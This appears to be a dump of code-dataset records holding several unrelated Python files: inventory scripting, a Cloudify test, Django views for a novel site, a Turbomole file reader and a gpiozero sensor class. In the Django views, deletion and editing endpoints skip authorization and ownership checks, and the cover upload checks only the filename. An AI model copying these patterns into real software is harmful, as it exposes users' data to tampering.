#print('Unable to update the group {} {}'.format(results, e))\n                    logging.info('Unable to update the group {} {}'.format(results, e))\n\n\ndef add_indexes():\n    '''\n    Creates the proper database indexes to improve lookup time\n    '''\n    try:\n        local_devices.create_index([( 'name', pymongo.ASCENDING)], unique=True)\n        logging.info('Created the \"NAME\" index on Netbox devices collection')\n    except Exception as e:\n        #print('Netbox MongoDB devices collection already has the \"NAME\" index')\n        logging.info('Netbox MongoDB devices collection already has the \"NAME\" index')\n\n    try:\n        local_hosts.create_index([( 'name', pymongo.ASCENDING)], unique=True)\n        logging.info('Created the \"NAME\" index on Ansible hosts collection')\n    except Exception as e:\n        #print('Ansible MongoDB hosts collection already has the \"NAME\" index')\n        logging.info('Ansible MongoDB hosts collection already has the \"NAME\" index')\n\n    try:\n        local_groups.create_index([( 'hosts', pymongo.ASCENDING)], unique=True)\n        logging.info('Created the \"HOSTS\" index on Ansible groups collection')\n    except Exception as e:\n        #print('Ansible MongoDB groups collection already has the \"HOSTS\" index')\n        logging.info('Ansible MongoDB groups collection already has the \"HOSTS\" index')\n\n    try:\n        local_groups.create_index([( 'groups', pymongo.ASCENDING)], unique=True)\n        logging.info('Created the \"GROUPS\" index on Ansible groups collection')\n    except Exception as e:\n        #print('Ansible MongoDB groups collection already has the \"GROUPS\" index')\n        logging.info('Ansible MongoDB groups collection already has the \"GROUPS\" index')\n\n\nif __name__ == \"__main__\":\n    for device in local_nodes.find():\n        device = BaseHost(**device)\n        device.to_netbox()\n        device.to_ansible()\n\n    create_ansible_groups()\n    
add_indexes()\n\n","sub_path":"scripts/dynamic_inventory.py","file_name":"dynamic_inventory.py","file_ext":"py","file_size_in_byte":15673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"132770715","text":"from scipy.ndimage.interpolation import shift\n\ndef dirderivative(img,dirvec):\n '''Take a quick directional derivative with direction dirvec.\n This is a lazy way of doing it, wraps around the edge.\n '''\n dx = img - shift(img,[0,1])\n dy = img - shift(img,[1,0])\n return dx*dirvec[0] + dy*dirvec[1];\n\n","sub_path":"dtyu/SimulationCode/pyCXD/tools/derivative.py","file_name":"derivative.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"163075933","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport os\n\nfrom cloudify.workflows import local\nfrom cloudify_cli import constants as cli_constants\n\nfrom cosmo_tester.framework.util import (create_rest_client, YamlPatcher,\n get_yaml_as_dict)\nfrom cosmo_tester.test_suites.test_blueprints.nodecellar_test\\\n import NodecellarAppTest\nfrom cosmo_tester.framework.git_helper import clone\n\nMANAGER_BLUEPRINTS_REPO_URL = 'https://github.com/cloudify-cosmo/' \\\n 'cloudify-manager-blueprints.git'\n\n\nclass NodecellarSingleHostTest(NodecellarAppTest):\n\n def setUp(self):\n super(NodecellarSingleHostTest, self).setUp()\n blueprint_path = self.copy_blueprint('openstack-start-vm')\n self.blueprint_yaml = blueprint_path / 'blueprint.yaml'\n self.prefix = 'simple-host-{0}'.format(self.test_id)\n self.manager_blueprint_overrides = {}\n\n self.inputs = {\n 'prefix': self.prefix,\n 'external_network': self.env.external_network_name,\n 'os_username': self.env.keystone_username,\n 'os_password': self.env.keystone_password,\n 'os_tenant_name': self.env.keystone_tenant_name,\n 'os_region': self.env.region,\n 'os_auth_url': self.env.keystone_url,\n 'image_id': self.env.ubuntu_trusty_image_id,\n 'flavor': self.env.medium_flavor_id,\n 'key_pair_path': '{0}/{1}-keypair.pem'.format(self.workdir,\n self.prefix)\n }\n\n self.logger.info('initialize local env for running the '\n 'blueprint that starts a vm')\n self.local_env = local.init_env(\n self.blueprint_yaml,\n inputs=self.inputs,\n name=self._testMethodName,\n ignored_modules=cli_constants.IGNORED_LOCAL_WORKFLOW_MODULES)\n\n self.logger.info('starting vm to serve as the management vm')\n self.local_env.execute('install',\n task_retries=10,\n task_retry_interval=30)\n self.public_ip_address = \\\n self.local_env.outputs()['simple_vm_public_ip_address']\n self.private_ip_address = \\\n self.local_env.outputs()['simple_vm_private_ip_address']\n\n self.addCleanup(self.cleanup)\n\n def test_nodecellar_single_host(self):\n self.bootstrap_simple_manager_blueprint()\n self._test_nodecellar_impl('singlehost-blueprint.yaml')\n\n def _update_manager_blueprint(self):\n 
self._update_manager_blueprints_overrides()\n\n with YamlPatcher(self.test_manager_blueprint_path) as patch:\n for prop_path, new_value in \\\n self.manager_blueprint_overrides.items():\n patch.set_value(prop_path, new_value)\n\n def _update_manager_blueprints_overrides(self):\n manager_blueprint_dict = \\\n get_yaml_as_dict(self.env._manager_blueprint_path)\n\n agents_prop_in_dict = manager_blueprint_dict['node_templates'][\n 'manager']['properties']['cloudify_packages']['agents']\n agents_prop_string = \\\n 'node_templates.manager.properties.cloudify_packages.agents'\n\n docker_prop_in_dict = manager_blueprint_dict['node_templates'][\n 'manager']['properties']['cloudify_packages']['docker']\n docker_prop_string = \\\n 'node_templates.manager.properties.cloudify_packages.docker'\n\n self.manager_blueprint_overrides['{0}.ubuntu_agent_url'.format(\n agents_prop_string)] = agents_prop_in_dict['ubuntu_agent_url']\n self.manager_blueprint_overrides['{0}.centos_agent_url'.format(\n agents_prop_string)] = agents_prop_in_dict['centos_agent_url']\n self.manager_blueprint_overrides['{0}.windows_agent_url'.format(\n agents_prop_string)] = agents_prop_in_dict['windows_agent_url']\n self.manager_blueprint_overrides['{0}.docker_url'.format(\n docker_prop_string)] = docker_prop_in_dict['docker_url']\n\n def _bootstrap(self):\n self.cfy.bootstrap(blueprint_path=self.test_manager_blueprint_path,\n inputs_file=self.test_inputs_path,\n task_retries=5)\n self.addCleanup(self.cfy.teardown)\n\n def bootstrap_simple_manager_blueprint(self):\n self.manager_blueprints_repo_dir = clone(MANAGER_BLUEPRINTS_REPO_URL,\n self.workdir)\n self.test_manager_blueprint_path = \\\n os.path.join(self.manager_blueprints_repo_dir,\n 'simple', 'simple-manager-blueprint.yaml')\n\n # using the updated handler configuration blueprint to update the\n # package urls in the simple manager blueprint\n self._update_manager_blueprint()\n\n self.bootstrap_inputs = {\n 'public_ip': self.public_ip_address,\n 'private_ip': self.private_ip_address,\n 'ssh_user': 'ubuntu',\n 'ssh_key_filename': self.inputs['key_pair_path'],\n\n 'agents_user': 'ubuntu',\n 'resources_prefix': ''\n }\n\n # preparing inputs file for bootstrap\n self.test_inputs_path = \\\n self.cfy._get_inputs_in_temp_file(self.bootstrap_inputs,\n self._testMethodName)\n self._bootstrap()\n self._running_env_setup(self.public_ip_address)\n\n def get_inputs(self):\n return {\n 'host_ip': self.private_ip_address,\n 'agent_user': 'ubuntu',\n # default agent key location\n 'agent_private_key_path': '~/.ssh/agent_key.pem'\n }\n\n def _running_env_setup(self, management_ip):\n self.env.management_ip = management_ip\n self.client = create_rest_client(management_ip)\n response = self.client.manager.get_status()\n if not response['status'] == 'running':\n raise RuntimeError('Manager at {0} is not running.'\n .format(management_ip))\n\n def cleanup(self):\n self.local_env.execute('uninstall',\n task_retries=40,\n task_retry_interval=30)\n\n def get_public_ip(self, nodes_state):\n return self.public_ip_address\n\n @property\n def expected_nodes_count(self):\n return 4\n\n @property\n def host_expected_runtime_properties(self):\n return []\n","sub_path":"cosmo_tester/test_suites/test_simple_manager_blueprint/nodecellar_singlehost_test.py","file_name":"nodecellar_singlehost_test.py","file_ext":"py","file_size_in_byte":7078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"343661004","text":"import datetime\nimport json\nimport re\n\nfrom 
django.shortcuts import render, get_object_or_404\nfrom django.conf import settings\nfrom django.db.models import Count\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.http import JsonResponse\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.db.models import Sum\nfrom django.core.cache import cache\nfrom django.core import serializers\n\nfrom .models import Novel, NovelType, NovelChapter\nfrom user.models import Profile\nfrom history.models import History\nfrom rate.models import Rate\nfrom pure_pagination import Paginator, PageNotAnInteger\nfrom read_count.utils import visit, get_seven_days_read_num, get_today_hot_data\nfrom mysite.utils import get_random_str\n\n\n# Read-count ranking of novels over the given number of days\ndef get_days_hot_novels(days):\n    today = timezone.now().date()\n    date = today - datetime.timedelta(days=days)\n    novels = Novel.objects.filter(read_detail__date__lte=today, read_detail__date__gte=date).values('id',\n                                                                                                    'title',\n                                                                                                    ).annotate(\n        Sum('read_detail__read_num')).order_by('-read_detail__read_num__sum')\n    return novels\n\n\n# Fetch the ranking from the cache, computing and storing it on a miss\n# (the original cached the value but never returned or reused it)\ndef use_cache(document, days):\n    do = cache.get(document)\n    if do is None:\n        do = get_days_hot_novels(days)\n        cache.set(document, do, 3600)\n    return do\n\n\n# Helper that assembles the context data shared by the list views\ndef get_novel_common_data(request, novels, each_page_num=settings.EACH_PAGE_NUM):\n    try:\n        page = request.GET.get('page', 1)\n    except PageNotAnInteger:\n        page = 1\n    p = Paginator(novels, each_page_num, request=request)\n    novels_page = p.page(page)\n\n    # total number of novels for each month\n    novel_dates = Novel.objects.dates('create_time', 'month', 'DESC')\n    novel_dates_list = {}\n    for novel_date in novel_dates:\n        novel_count = Novel.objects.filter(create_time__year=novel_date.year,\n                                           create_time__month=novel_date.month).count()\n        novel_dates_list[novel_date] = novel_count\n\n    novel_content_type = ContentType.objects.get_for_model(Novel)  # ContentType of Novel\n\n    context = {\n        'read_nums': get_seven_days_read_num(novel_content_type),  # daily read counts for the last seven days\n        'today_hot_datas': get_today_hot_data(novel_content_type),  # daily ranking\n        'week_hot_novels': use_cache('week_hot_novels', timezone.now().weekday()),  # weekly ranking (cached)\n        'month_hot_novels': use_cache('month_hot_novels', timezone.now().month),  # monthly ranking (cached)\n        'novels_dates': novel_dates_list,\n        'novels_page': novels_page,\n        'novel_types': NovelType.objects.annotate(count=Count('novel'))\n    }\n    return context\n\n\ndef novel_list(request):\n    novels = Novel.objects.all()\n    context = get_novel_common_data(request, novels)\n    return render(request, 'novel_list.html', context)\n\n\ndef novels_chapter(request, novels_title_pk, novels_chapter_num):\n    novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n    novel_type = get_object_or_404(NovelType, type_name=novel_title.novel_type)\n    novel_content_type = ContentType.objects.get_for_model(Novel)\n    if request.user.is_authenticated:\n        History.objects.update_or_create(content_type=novel_content_type, object_id=novels_title_pk, user=request.user)\n        if not Rate.objects.filter(content_type=novel_content_type, object_id=novels_title_pk,\n                                   user=request.user).exists():\n            Rate.objects.create(content_type=novel_content_type, object_id=novels_title_pk, user=request.user, rating=1)\n    cookies_key = visit(request, novel_title)\n    if NovelChapter.objects.filter(novel_title=novel_title, chapter_num=novels_chapter_num).exists():\n        novels_chapter = NovelChapter.objects.get(novel_title=novel_title, chapter_num=novels_chapter_num)  # a single chapter of the novel\n
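        # Editor's note - illustrative sketch, not part of the original view:\n        # the ten-per-page grouping a few lines below can also be written as a\n        # single comprehension, e.g.\n        #\n        #     pages = [novels_chapters[s:s + 10]\n        #              for s in range(0, last_novel.chapter_num, 10)]\n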
        novels_chapters = novel_title.novel.all()  # all chapters of the novel\n        previous_chapter = NovelChapter.objects.filter(novel_title=novel_title,\n                                                       chapter_num__lt=novels_chapter_num).last()\n        next_chapter = NovelChapter.objects.filter(novel_title=novel_title, chapter_num__gt=novels_chapter_num).first()\n        last_novel = NovelChapter.objects.filter(novel_title=novel_title).last()\n        chapters = []\n        last_chapters = {}\n        novel_words = 0\n        for i in novels_chapters:\n            novel_words += len(i.chapter_content)\n        if last_novel.chapter_num > 10:\n            # number of full ten-chapter pages (the original took the first\n            # digit of the chapter number, which breaks past chapter 99)\n            times = last_novel.chapter_num // 10\n            for i in range(times):\n                chapters.append({\n                    'chapter_title': novels_chapters[i * 10:i * 10 + 10],\n                    'start_chapter': i * 10 + 1,\n                    'end_chapter': i * 10 + 10,\n                })\n            last_chapters['last_chapters_title'] = novels_chapters[times * 10:last_novel.chapter_num + 1]\n            last_chapters['last_chapter_start'] = times * 10 + 1\n            last_chapters['last_chapter_end'] = last_novel.chapter_num\n        else:\n            last_chapters['last_chapters_title'] = novels_chapters[:last_novel.chapter_num + 1]\n            last_chapters['last_chapter_start'] = 1\n            last_chapters['last_chapter_end'] = last_novel.chapter_num\n        response = render(request, 'novels_chapter.html', context={\n            'novel': Novel.objects.get(pk=novels_title_pk),\n            'author': User.objects.get(username=Novel.objects.get(pk=novels_title_pk).author),\n            'novels_chapter': novels_chapter,\n            'novels_chapter_words': len(novels_chapter.chapter_content),\n            'novel_words': novel_words,\n            'novels_title_pk': novels_title_pk,\n            'novel_type': novel_type,\n            'chapters': chapters,\n            'last_chapters': last_chapters,\n            'last_novel': last_novel,\n            'previous_chapter': previous_chapter,\n            'next_chapter': next_chapter\n        })\n        response.set_cookie(cookies_key, 'true')\n        return response\n    else:\n        novels = Novel.objects.all()\n        context = get_novel_common_data(request, novels, 18)\n        context['msg'] = '无搜索结果'\n        context['tip'] = '发生错误'\n        return render(request, '404.html', context)\n\n\ndef novels_with_type(request, novels_type_pk):\n    sort = request.GET.get('sort', 'create_time')\n    novel_type = get_object_or_404(NovelType, pk=novels_type_pk)\n    novels = Novel.objects.filter(novel_type=novel_type)\n    if sort == 'create_time':\n        novels = Novel.objects.filter(novel_type=novel_type)\n    elif sort == 'click_num':\n        novels = Novel.objects.filter(novel_type=novel_type).order_by('-read_num__read_num')\n    elif sort == 'like_num':\n        novels = Novel.objects.filter(novel_type=novel_type).order_by('-like_count__like_num')\n    elif sort == 'read_num':\n        novels = Novel.objects.filter(novel_type=novel_type).order_by('-read_count__read_num')\n    context = get_novel_common_data(request, novels)\n    context['sort'] = sort\n    context['novel_type'] = novel_type\n    context['novels_type_pk'] = novels_type_pk\n    return render(request, 'novels_with_type.html', context)\n\n\ndef novels_with_date(request, year, month):\n    novels = Novel.objects.filter(create_time__year=year, create_time__month=month)\n    context = get_novel_common_data(request, novels)\n    context['novels_with_date'] = '%s年%s月' % (year, month)\n    return render(request, 'novels_with_date.html', context)\n\n\ndef novels_with_search(request):\n    novels_title = request.GET.get('novel_title', '')\n    sort = request.GET.get('sort', 'create_time')\n    novels = Novel.objects.filter(title__icontains=novels_title)\n    if novels_title == '' or not novels.exists():\n        novels = Novel.objects.all()\n        context = get_novel_common_data(request, novels, 18)\n        context['msg'] = '无搜索结果'\n        context['tip'] = '搜索'\n        context['other_title'] = '最近更新'\n        return render(request, '404.html', context)
\n    else:\n        if sort == 'create_time':\n            novels = Novel.objects.filter(title__icontains=novels_title)\n        elif sort == 'click_num':\n            novels = Novel.objects.filter(title__icontains=novels_title).order_by('-read_num__read_num')\n        elif sort == 'like_num':\n            novels = Novel.objects.filter(title__icontains=novels_title).order_by('-like_count__like_num')\n        elif sort == 'read_num':\n            novels = Novel.objects.filter(title__icontains=novels_title).order_by('-read_count__read_num')\n        context = get_novel_common_data(request, novels)\n        context['sort'] = sort\n        context['novels_title'] = novels_title\n        return render(request, 'novels_with_search.html', context)\n\n\ndef novels_with_write(request):\n    return render(request, 'novels_with_write.html', context={\n        'novel_types': NovelType.objects.all()\n    })\n\n\ndef publish_title(request):\n    title = request.GET.get('title', '').strip()\n    if Novel.objects.filter(title=title).exists():\n        return JsonResponse(data={\n            'status': 'ERR',\n            'active': 'uk-form-danger'\n        })\n    else:\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'active': 'uk-form-success'\n        })\n\n\ndef update_title(request):\n    title = request.GET.get('title', '').strip()\n    first_title = request.GET.get('first_title', '').strip()\n    if title != first_title:\n        if Novel.objects.filter(title=title).exists():\n            return JsonResponse(data={\n                'status': 'ERR',\n                'active': 'uk-form-danger'\n            })\n        else:\n            return JsonResponse(data={\n                'status': 'SUCCESS',\n                'active': 'uk-form-success'\n            })\n    else:\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'active': 'uk-form-success'\n        })\n\n\ndef novels_with_publish(request):\n    title = request.POST.get('title', '').strip()\n    novel_type = request.POST.get('novel_type', '')\n    introduction = request.POST.get('introduction', '').replace('\n', '<br>　　')\n    chapter_title = request.POST.get('chapter_title', '').strip()\n    chapter_content = request.POST.get('chapter_content', '').replace('\n', '<br>　　')\n    if title == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '作品名不能为空'\n        })\n    elif chapter_title == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '章节名不能为空'\n        })\n    elif novel_type == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '类型没有选择'\n        })\n    elif introduction == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '简介不能为空'\n        })\n    elif chapter_content == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '内容不能为空'\n        })\n    elif Novel.objects.filter(title=title).exists():\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '作品名已存在'\n        })\n    elif not NovelType.objects.filter(type_name=novel_type).exists():\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '作品类型不存在'\n        })\n    else:\n        novel_type = NovelType.objects.get(type_name=novel_type)\n        Novel.objects.create(title=title, author=request.user, novel_type=novel_type,\n                             introduction=introduction)\n        novel_title = Novel.objects.get(title=title)\n        NovelChapter.objects.create(novel_title=novel_title, chapter_title=chapter_title,\n                                    chapter_content=chapter_content)\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'msg': '发布成功'\n        })\n\n\ndef novels_my_write(request):\n    if request.user.is_authenticated:\n        novel = get_object_or_404(User, username=request.user.username)\n        novels = novel.user.all()\n        context = get_novel_common_data(request, novels, 18)\n        return render(request, 'novels_my_write.html', context)\n    else:\n        return render(request, 'novels_my_write.html', context={})\n\n\ndef novels_with_cmt(request, novels_title_pk):\n    novel = Novel.objects.get(pk=novels_title_pk)\n    novel_content_type = ContentType.objects.get_for_model(Novel)\n    return render(request, 'novels_with_cmt.html', context={\n        'novels_title_pk': novels_title_pk,\n        'novel': novel,\n        'content_type': novel_content_type.model\n    })\n\n\ndef novels_with_add(request, novels_title_pk):\n    if request.user.is_authenticated:\n        novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n        novels_chapters_count = novel_title.novel.all().count()\n        return render(request, 'novels_with_add.html', context={\n            'novels_chapters_count': novels_chapters_count + 1,\n            'novels_title_pk': novels_title_pk\n        })\n    else:\n        return render(request, 'novels_with_add.html', context={})\n\n\ndef novels_with_del(request):\n    novels_title_pk = request.POST.get('novels_title_pk', '')\n    if novels_title_pk == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '没有作品被选中'\n        })\n    else:\n        Novel.objects.filter(pk=novels_title_pk).delete()\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'msg': '删除成功'\n        })\n\n\ndef add_chapter(request):\n    novels_title_pk = request.POST.get('novels_title_pk', '').strip()\n    chapter_title = request.POST.get('chapter_title', '').strip()\n    chapter_num = request.POST.get('chapter_num', '').strip()\n    chapter_content = request.POST.get('chapter_content', '').replace('\n', '<br>　　')\n    if novels_title_pk == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '作品不能为空'\n        })\n    elif chapter_title == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '章节名不能为空'\n        })\n    elif chapter_num == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '章节数不能为空'\n        })\n    elif chapter_content == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '内容不能为空'\n        })\n    else:\n        novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n        NovelChapter.objects.create(novel_title=novel_title, chapter_title=chapter_title, chapter_num=chapter_num,\n                                    chapter_content=chapter_content)\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'msg': '发布成功'\n        })\n\n\ndef novels_with_edit(request, novels_title_pk):\n    if request.user.is_authenticated:\n        novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n        if request.user == Novel.objects.get(pk=novels_title_pk).author:\n            novels_chapters = novel_title.novel.all()  # all chapters of the novel\n            last_novel = NovelChapter.objects.filter(novel_title=novel_title).last()\n            chapters = []\n            last_chapters = {}\n            if last_novel.chapter_num > 10:\n                # number of full ten-chapter pages (the original took the first\n                # digit of the chapter number, which breaks past chapter 99)\n                times = last_novel.chapter_num // 10\n                for i in range(times):\n                    chapters.append({\n                        'chapter_title': novels_chapters[i * 10:i * 10 + 10],\n                        'start_chapter': i * 10 + 1,\n                        'end_chapter': i * 10 + 10,\n                    })\n                last_chapters['last_chapters_title'] = novels_chapters[times * 10:last_novel.chapter_num + 1]\n                last_chapters['last_chapter_start'] = times * 10 + 1\n                last_chapters['last_chapter_end'] = last_novel.chapter_num\n            else:\n                last_chapters['last_chapters_title'] = novels_chapters[:last_novel.chapter_num + 1]\n                last_chapters['last_chapter_start'] = 1\n                last_chapters['last_chapter_end'] = last_novel.chapter_num\n            return render(request, 'novels_with_edit.html', context={\n                'novels_title_pk': novels_title_pk,\n                'novel': Novel.objects.get(title=novel_title),\n                'novel_types': NovelType.objects.all(),\n                'chapters': chapters,\n                'first_chapters': NovelChapter.objects.filter(novel_title=novel_title).first(),\n                'last_chapters': last_chapters\n            })\n        else:\n            novels = Novel.objects.all()\n            context = get_novel_common_data(request, novels, 18)\n            context['msg'] = '用户错误'\n            return render(request, '404.html', context)\n    else:\n        return render(request, 'novels_with_edit.html', context={})\n\n\ndef upload_cover(request):\n    cover = request.FILES.get('cover')\n    novels_title_pk = request.POST.get('novels_title_pk', '')\n    if not re.match(r'^.*?(png|jpg|bmp|gif|jpeg)$', cover.name):\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '图片格式不正确'\n        })\n    else:\n        name = get_random_str() + cover.name\n        novels = Novel.objects.get(pk=novels_title_pk)\n        novels.cover = 'cover/' + name\n        novels.save()\n\n        fname = settings.MEDIA_ROOT + '/cover/' + name\n        with open(fname, 'wb') as file:\n            for i in cover.chunks():\n                file.write(i)\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'msg': '修改成功'\n        })\n\n\ndef get_chapter(request):\n    novels_title_pk = request.GET.get('novels_title_pk', '').strip()\n    chapter_num = request.GET.get('chapter_num', '').strip()\n    if chapter_num == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '章节不能为空'\n        })\n    else:\n        novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n        novels_chapter = NovelChapter.objects.filter(novel_title=novel_title, chapter_num=chapter_num)\n        data = json.loads(serializers.serialize(\"json\", novels_chapter))\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'novels_chapter': data[0]['fields']\n        })\n\n\ndef edit_chapter(request):\n    novels_title_pk = request.POST.get('novels_title_pk', '')\n    title = request.POST.get('title', '').strip()\n    is_end = request.POST.get('is_end', 0)\n    novel_type = request.POST.get('novel_type', '').strip()\n    notice = request.POST.get('notice', '暂无公告')\n    introduction = request.POST.get('introduction', '暂无简介')\n    chapter_num = request.POST.get('chapter_num', '').strip()\n    chapter_title = request.POST.get('chapter_title', '').strip()\n    chapter_content = request.POST.get('chapter_content', '').replace('\n', '<br>　　')\n    if novels_title_pk == '' or chapter_num == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '没有小说被选中'\n        })\n    elif title == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '作品名不能为空'\n        })\n    elif novel_type == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '没有选择类型'\n        })\n    elif chapter_num == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '章节数不能为空'\n        })\n    elif chapter_title == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '章节名不能为空'\n        })\n    elif chapter_content == '':\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '内容不能为空'\n        })\n    elif not Novel.objects.filter(pk=novels_title_pk).exists():\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '作品不存在'\n        })\n    if title != Novel.objects.get(pk=novels_title_pk).title:\n        if Novel.objects.filter(title=title).exists():\n            return JsonResponse(data={\n                'status': 'ERR',\n                'msg': '作品名已存在'\n            })\n    if not NovelType.objects.filter(type_name=novel_type).exists():\n        return JsonResponse(data={\n            'status': 'ERR',\n            'msg': '作品类型不存在'\n        })\n    else:\n        novel_type = NovelType.objects.get(type_name=novel_type)\n        novel = Novel.objects.get(pk=novels_title_pk)\n        novel.title = title\n        novel.is_end = is_end\n        novel.author = request.user\n        novel.novel_type = novel_type\n        novel.introduction = introduction\n        novel.notice = notice\n        novel.save()\n\n        novel_title = Novel.objects.get(pk=novels_title_pk)\n        novels_chapter = NovelChapter.objects.get(novel_title=novel_title, chapter_num=chapter_num)\n        novels_chapter.novel_title = novel_title\n        novels_chapter.chapter_title = chapter_title\n        novels_chapter.chapter_content = chapter_content\n        novels_chapter.save()\n\n        return JsonResponse(data={\n            'status': 'SUCCESS',\n            'msg': '保存成功'\n        })\n\n\ndef novels_my_read(request):\n    if request.user.is_authenticated:\n        user = Profile.objects.get(user=request.user)\n        novels = user.novels.all()\n        for novel in novels:\n            novel.count = NovelChapter.objects.filter(novel_title=novel.pk).count()\n        context = get_novel_common_data(request, novels)\n        return render(request, 'novels_my_read.html', context)\n    else:\n        return render(request, 'novels_my_read.html', context={})\n","sub_path":"novel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58342005","text":"from stk.utilities import periodic_table\n\n\ndef _with_structure_from_turbomole(self, path):\n    \"\"\"\n    Return a clone, with its structure taken from a Turbomole file.\n\n    Note that coordinates in ``.coord`` files are given in Bohr.\n\n    Parameters\n    ----------\n    path : :class:`str`\n        The full path of the ``.coord`` file from which the\n        structure should be updated.\n\n    Returns\n    -------\n    :class:`.Molecule`\n        A clone with atomic positions found in `path`.\n\n    Raises\n    ------\n    :class:`RuntimeError`\n        If the number of atoms in the file does not match the\n        number of atoms in the molecule or if atom elements in the\n        file do not agree with the atom elements in the molecule.\n\n    \"\"\"\n\n    bohr_to_ang = 0.5291772105638411\n\n    with open(path, 'r') as f:\n        _, *content, __ = f.readlines()\n\n    # Check the atom count is correct.\n    num_atoms = len(self._atoms)\n    if len(content) != num_atoms:\n        raise RuntimeError(\n            'The number of atoms in the coord file, '\n            f'{len(content)}, does not match the number of atoms '\n            f'in the molecule, {num_atoms}.'\n        )\n\n    # Save all the coords in the file.\n    new_coords = []
\n    for i, line in enumerate(content):\n        *coords, element = line.split()\n        if element.isnumeric():\n            element = periodic_table[int(element)]\n\n        if element != self._atoms[i].__class__.__name__:\n            raise RuntimeError(\n                f'Atom {i} element does not match file.'\n            )\n\n        new_coords.append([float(coord)*bohr_to_ang for coord in coords])\n\n    # Check that the correct number of atom\n    # lines was present in the file.\n    if i+1 != num_atoms:\n        raise RuntimeError(\n            'The number of atom lines in the coord file, '\n            f'{i+1}, does not match the number of atoms '\n            f'in the molecule, {num_atoms}.'\n        )\n\n    # Update the structure.\n    return self._with_position_matrix(new_coords)\n","sub_path":"src/stk/molecular/molecules/molecule/utilities/updaters/turbomole.py","file_name":"turbomole.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"15454561","text":"from gpiozero import LineSensor\n\n\nclass SensorDeLinha:\n    # This constructor takes no pin arguments because the sensor positions are\n    # fixed for now, running from GPIO5 (board pin 29) through GPIO26 (board pin 37)\n    def __init__(self):\n        self.sensor = [0,0,0,0,0]\n        try:\n            self.sensor[0] = LineSensor(5)\n            self.sensor[1] = LineSensor(6)\n            self.sensor[2] = LineSensor(13)\n            self.sensor[3] = LineSensor(19)\n            self.sensor[4] = LineSensor(26)\n        except Exception:\n            print(\"Sensors are not connected correctly\")\n\n    def getValue(self, numSensor):\n        return self.sensor[numSensor].value\n\n","sub_path":"ProgrammingToTeach/API-Connection/linha.py","file_name":"linha.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"322096484","text":"import os\nimport sys\nfrom pathlib import Path\nfrom unittest.mock import MagicMock, patch, PropertyMock\nimport pytest\nfrom opentrons.api import Session\nfrom opentrons.hardware_control import ThreadedAsyncLock\n\nfrom robot_server.service.protocol.protocol import UploadedProtocol, \\\n    UploadedProtocolMeta, FileMeta\nfrom robot_server.service.session.session_types.protocol.execution. 
